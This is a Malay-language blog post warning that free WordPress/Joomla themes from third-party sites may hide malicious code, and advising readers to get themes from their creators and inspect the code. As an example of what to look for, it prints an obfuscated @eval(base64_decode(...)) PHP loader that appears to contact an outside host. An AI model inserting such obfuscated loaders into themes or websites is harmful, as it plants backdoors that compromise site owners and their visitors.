
Adakah anda menggunakan themes Wordpress/Joomla percuma di blog anda? Jika ya, sila uninstall themes anda sekarang dan gunakan default themes sahaja. Seandainya anda berhasrat untuk menukar themes blog anda, pastikan anda tidak menukarnya dengan themes yang diperolehi secara percuma daripada internet dengan sewenang-wenangnya. Ingat! yang percuma itu tidak selalunya baik dan menguntungkan anda.
Tahukah anda, terdapat sebilangan themes yang menarik dan percuma sebenarnya mengandungi malicious code yang mampu melakukan pelbagai aktiviti haram seperti menjejaki pengunjung blog anda dan berkebolehan untuk memaparkan iklan-iklan yang tidak sepatutnya. Themes ini juga akan menjana kod tertentu untuk menghasilkan spam atau phishing melalui blog anda tanpa anda sedari.
Jika anda tidak mampu untuk membeli themes, mungkin kerana themes kesukaan anda terlalu mahal atau anda ingin berjimat cermat anda sebenarnya masih lagi boleh menggunakan themes percuma. Syaratnya, pastikan themes tersebut diperolehi daripada pihak yang menciptanya sendiri yang diyakini benar dan bukan terus melalui pihak ketiga. Kebiasaannya themes-themes percuma ini lebih mudah didapati daripada blog pihak ketiga yang membuat koleksi themes percuma berbanding daripada blog pencipta themes itu sendiri.
Selain itu, jika anda fasih memahami bahasa html atau php, cuba teliti kod-kod yang ada di dalam di dalam themes anda. Pastikan tiada kod yang pelik seperti di bawah, jika ada hapuskan sahaja kod tersebut. Themes percuma tidak memerlukan kod yang dienkrip seperti ini:
@eval(@base64_decode(’aWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3Q\
jY3MzVBQkMzMDkxNiA9IEBmc29ja29wZW4oInd3dy53cHNzci5jb20i\
LCA4MCwgJFIzMkQwMDA3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiw\
gJFI1RjUyNUY1QjM5OERBREQ3Q0YwNzg0QkQ0MDYyOThFMywgMykpICR\
SNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3Bzc3I\’));
P/s: Suatu hari saya juga akan membeli themes sendiri, atau mungkin menciptanya sendiri. ![]()
Add New Comment
Viewing 3 Comments
Thanks. Your comment is awaiting approval by a moderator.
Do you already have an account? Log in and claim this comment.
Do you already have an account? Log in and claim this comment.
Do you already have an account? Log in and claim this comment.
Do you already have an account? Log in and claim this comment.
Add New Comment